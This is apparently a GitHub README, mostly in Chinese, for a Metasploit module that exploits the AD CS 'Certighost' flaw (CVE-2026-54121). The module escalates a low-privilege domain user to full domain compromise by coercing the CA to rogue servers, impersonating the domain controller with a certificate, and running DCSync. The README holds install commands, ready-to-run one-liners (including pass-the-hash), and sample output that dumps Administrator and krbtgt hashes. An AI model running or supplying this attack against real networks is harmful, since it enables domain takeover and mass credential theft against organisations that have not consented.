nafiez/Metasploit-CVE-2026-54121-Certighost
GitHub: nafiez/Metasploit-CVE-2026-54121-Certighost
该模块利用 AD CS 注册中「chase」回退漏洞(CVE-2026-54121),实现从低权限域用户到完全攻陷整个域的自动化提权攻击。
Stars: 0 | Forks: 0
# Metasploit-CVE-2026-54121-Certighost
Certighost 最初由 h0j3n 和 Aniq Fakhrul 发现并利用。此仓库包含一个 Metasploit auxiliary 模块,它通过滥用 AD CS 注册的 "chase" fallback,从任意低权限域用户提升权限至完全攻陷域。CA 可以被强制向攻击者控制的基础设施进行身份验证,随后颁发一个冒充 Domain Controller 的证书。该证书用于 PKINIT,UnPAC-the-hash 将恢复 DC 的 NT hash,其余工作则由 DCSync 完成。
## 安装
```
mkdir -p ~/.msf4/modules/auxiliary/admin/dcerpc
cp cve_2026_54121_certighost.rb ~/.msf4/modules/auxiliary/admin/dcerpc/
```
验证其解析并加载:
```
ruby -c ~/.msf4/modules/auxiliary/admin/dcerpc/cve_2026_54121_certighost.rb
```
```
msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; show options; exit"
```
端口 389 和 445 是特权端口,因此该模块必须以 root 身份运行。
## 用法
### 密码认证
MSF 单行命令
```
sudo msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN corp.local; set USERNAME jdoe; set PASSWORD 'Passw0rd!'; set DC_IP 10.0.0.10; set ACTION FULL; run"
```
运行 `msfconsole`
```
use auxiliary/admin/dcerpc/cve_2026_54121_certighost
set DOMAIN corp.local
set USERNAME jdoe
set PASSWORD 'Passw0rd!'
set DC_IP 10.0.0.10
set ACTION FULL
run
```
### Pass-the-hash
MSF 单行命令
```
sudo msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN corp.local; set USERNAME jdoe; set NTLM_HASH 69289a87353c7083842956a62652d46c; set DC_IP 10.0.0.10; set ACTION FULL; run"
```
运行 `msfconsole`
```
use auxiliary/admin/dcerpc/cve_2026_54121_certighost
set DOMAIN corp.local
set USERNAME jdoe
set NTLM_HASH 69289a87353c7083842956a62652d46c
set DC_IP 10.0.0.10
set ACTION FULL
run
```
`NTLM_HASH` 接受纯 NT hash、`:NT` 或 `LM:NT`。当同时设置了 `PASSWORD` 和 `NTLM_HASH` 时,**hash 优先**。
### 仅获取证书
当你想要证书以供离线或日后使用时非常有用:
```
sudo msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN corp.local; set USERNAME jdoe; set PASSWORD 'Passw0rd!'; set DC_IP 10.0.0.10; set ACTION REQUEST_CERT; run"
```
## 示例
#### 成功利用
```
$ msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN contoso.lab; set USERNAME lowpriv; set PASSWORD Abc123,./; set DC_IP 192.168.10.10; set ACTION FULL; run"
[*] Starting persistent handler(s)...
[*] Setting default action FULL - view all 3 actions with the show actions command
DOMAIN => contoso.lab
USERNAME => lowpriv
PASSWORD => Abc123,./
DC_IP => 192.168.10.10
ACTION => FULL
[*] Certighost (CVE-2026-54121)
[*] Step 1: Discovering infrastructure via LDAP...
[*] Discovering CA...
[+] Found CA: ContosoCert-CA (DC01.contoso.lab)
[*] Discovering target DC...
[+] Target DC: DC01$ (DC01.contoso.lab)
[+] CA: ContosoCert-CA (192.168.10.10)
[+] Target: DC01$
[+] Domain SID: S-1-5-21-2005457936-2008376057-2514283296
[*] Step 2: Creating machine account via SAMR...
[+] Successfully created contoso.lab\GHOSTGQJZBJLO$
[+] Password: CGf0a69633d2Aa1
[+] SID: S-1-5-21-2005457936-2008376057-2514283296-1756
[+] Created: contoso.lab\GHOSTGQJZBJLO$
[*] Step 3: Starting rogue servers...
[*] Listener IP: 192.168.44.128
[+] Rogue LDAP server: 192.168.44.128:389
[+] Rogue SMB server: 192.168.44.128:445
[*] Pre-flighting Netlogon oracle...
[*] Connecting to the endpoint mapper service...
[+] Netlogon oracle ready
[*] Step 4: Requesting certificate via ICertPassage...
[+] Certificate issued!
[+] PFX (loot): /root/.msf4/loot/20260731030034_default_192.168.10.10_windows.ad.cs_287527.pfx
[+] PFX (local): /root/DC01_certighost.pfx
[+] Subject: /CN=DC01.contoso.lab
[+] Issuer: /DC=lab/DC=contoso/CN=ContosoCert-CA
[*] Step 5: Performing PKINIT as DC01$...
[+] PKINIT successful - TGT for DC01$@contoso.LAB
[+] ccache saved: /root/DC01.ccache
[*] Extracting NT hash from PAC...
[+] 192.168.10.10:88 - Received a valid TGS-Response
[*] 192.168.10.10:445 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20260731030034_default_192.168.10.10_mit.kerberos.cca_639932.bin
[+] NT Hash: dc01$:aad3b435b51404eeaad3b435b51404ee:846704be57649a259c45b8ce773dcf8d
[*] Step 6: Performing DCSync...
[*] Running DCSync as contoso.lab\DC01$ (output shown when complete)...
# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8c3efc486704d2ee71eebe71af14d86c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72446150d4b9a4dae4f0472fbb01b072:::
contoso.lab\lowpriv:1105:aad3b435b51404eeaad3b435b51404ee:69289a87353c7083842956a62652d46c:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:846704be57649a259c45b8ce773dcf8d:::
DESKTOP-JSB2FG3$:1106:aad3b435b51404eeaad3b435b51404ee:b7ca2860c012a21801407b5f5c45c453:::
GHOSTQMSEUHWX$:1751:aad3b435b51404eeaad3b435b51404ee:3e5e99d282391e10226f3d40111196ee:::
GHOSTGQJZBJLO$:1756:aad3b435b51404eeaad3b435b51404ee:cbe6ca2d2dffb6069be63ee0700a05cb:::
# 密码历史 (pwdump 格式 - uid:rid:lmhash:nthash:::):
Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:8c3efc486704d2ee71eebe71af14d86c:::
contoso.lab\lowpriv_history0:1105:82e343ae06e69d44033ee76a390286a8:8c3efc486704d2ee71eebe71af14d86c:::
DC01$_history0:1000:aad3b435b51404eeaad3b435b51404ee:3795fa26828ec5e8bf0dc948d2d82bbe:::
DESKTOP-JSB2FG3$_history0:1106:dbfadcdb0dd4f78c286e856dcc5ece74:a175b9f66ecd598f5bcf8185d0e2e322:::
[+] DCSync complete - 26 secret line(s) shown, others suppressed for opsec
[*] (SIDs, full pwdump, account info and kerberos-key sections hidden)
[*] Cleaning up: deleting GHOSTGQJZBJLO$ as Administrator (Administrator hash from DCSync)...
[+] The specified account has been deleted.
[+] Deleted GHOSTGQJZBJLO$
[*] Auxiliary module execution completed
```
#### 选项
```
msf auxiliary(admin/dcerpc/cve_2026_54121_certighost) > show options
Module options (auxiliary/admin/dcerpc/cve_2026_54121_certighost):
Name Current Setting Required Description
---- --------------- -------- -----------
ACCOUNT_NAME no The account name
ACCOUNT_PASSWORD no The password for the new account
ADD_CERT_APP_POLICY no Add certificate application policy OIDs
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
CA_IP no CA IP (auto-discovered if empty)
CA_NAME no CA name (auto-discovered if empty)
CERT_TEMPLATE User yes The certificate template
CLEANUP_ACCOUNT true no Delete the machine account when finished. Needs privileged credentials: the accoun
t's own creator has no DELETE right on it. With ACTION FULL the Administrator hash
recovered by DCSync is used automatically
CLEANUP_HASH no LM:NT or NT hash for CLEANUP_USER (pass-the-hash)
CLEANUP_PASS no Password for CLEANUP_USER
CLEANUP_USER no Account used to delete the machine account (defaults to the Administrator hash rec
overed by DCSync, else USERNAME)
DC_IP yes Domain Controller IP
DOMAIN yes Target domain FQDN (e.g., abc.local)
LDAPDomain no The domain to authenticate to
LDAPPassword no The password to authenticate with
LDAPUsername no The username to authenticate with
LISTENER no Attacker IP for rogue services (auto-detected if empty)
NTLM_HASH no NT hash for USERNAME, for pass-the-hash. Accepts LM:NT, :NT or a bare NT hash
NTLM_VALIDATE true no Validate the CA's NTLM auth via the Netlogon oracle. Set false to blindly accept i
t (no SMB signing) - useful to test whether the CA chase reaches LSA/LDAP at all,
but fails if the CA insists on signing
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
OUTPUT_DIR no Directory for the .pfx and .ccache files (defaults to the current working director
y)
PASSWORD no User password (required unless NTLM_HASH is set)
PFX no Certificate to request on behalf of
RHOSTS no Target host (auto-set from DC_IP)
ROGUE_LDAP_PORT 389 no Port for rogue LDAP server (CA defaults to 389)
ROGUE_SMB_PORT 445 no Port for rogue SMB/LSA server (CA defaults to 445)
RPORT 389 yes The target port (TCP)
SMBDomain no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
SSL false no Enable SSL on the LDAP connection
TARGET_DC no Target DC sAMAccountName to impersonate (auto-discovered if empty)
TEMPLATE Machine yes Certificate template
TIMEOUT 10 no Seconds to wait for rogue servers to receive connections
Timeout 10 yes The TCP timeout to establish Kerberos connection and read data
USERNAME yes Low-privilege domain user
Auxiliary action:
Name Description
---- -----------
FULL Full attack: certificate + PKINIT + DCSync
View the full module info with the info, or info -d command.
```
## 参考
- [技术分析 — H0j3n](https://gist.github.com/H0j3n/a5ef2609b5f2944ac2390a191a534c26)
- [原始 PoC — aniqfakhrul](https://github.com/aniqfakhrul/CVE-2026-54121)
- [CVE-2026-54121](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54121)
标签:AD CS, Checkov, log2timeline, 协议分析, 权限提升, 活动目录